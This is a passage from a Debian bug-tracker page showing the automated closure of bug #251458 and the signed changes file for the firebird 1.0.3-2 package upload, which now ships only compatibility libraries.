have further comments please address them to 251458@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Remco Seesink <raseesink@hotpop.com> (supplier of updated firebird package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Thu,  2 Sep 2004 21:26:01 +0200
Source: firebird
Binary: libfirebird-s64 libfirebird-c64 libfirebird-s32 firebird-dev libfirebird-c32
Architecture: source i386
Version: 1.0.3-2
Distribution: unstable
Urgency: high
Maintainer: Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>
Changed-By: Remco Seesink <raseesink@hotpop.com>
Description: 
 firebird-dev - Development files for FireBird - RDBMS based on InterBase 6.0 cod
 libfirebird-c32 - Library files for FireBird Classic w/ 32bit I/O, InterBase compat
 libfirebird-c64 - Library files for FireBird Classic w/ 64bit I/O, InterBase compat
 libfirebird-s32 - Library files for FireBird Super w/ 32bit I/O, InterBase compat
 libfirebird-s64 - Library files for FireBird Super w/ 64bit I/O, InterBase compat
Closes: 251458
Changes: 
 firebird (1.0.3-2) unstable; urgency=high
 .
   * This package will provide only firebird libraries from now on, which are
     useful for backward compatibility.  Closes: #251458
   * Documenting the situation in README.Debian
   * This version is needed to solve #268931 for sarge.
Files: 
 65e13b920594de0198d4b198a54116fb 807 misc optional firebird_1.0.3-2.dsc
 ce6fc5a808bbf1de2bf6ab726e0f7c6c 1111742 misc optional firebird_1.0.3-2.diff.gz
 2d27f35ce052580b76f17dfd9dd04b99 85828 misc optional firebird-dev_1.0.3-2_i386.deb
 504efc41a71dcb326f14748e1bec2c26 683992 misc optional libfirebird-c32_1.0.3-2_i386.deb
 84577cdd620fb659fa7267d7a5256ac8 146078 misc optional libfirebird-s32_1.0.3-2_i386.deb
 6977a6078ca22c667f1233c0ef5fffcc 684032 misc optional libfirebird-c64_1.0.3-2_i386.deb
 806dfaef69e3e977e081ca510d3fb3c3 146266 misc optional libfirebird-s64_1.0.3-2_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBPH4D4vzFZu62tMIRAhZqAJ9aKK0bghFyUlKdSY46m9ISvKweVACeJZbr
1SucDg6/wAonq9IPiz1MY28=
=KY+c
-----END PGP SIGNATURE-----





Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Mon Jun 5 02:36:55 2023; Machine Name: buxtehude
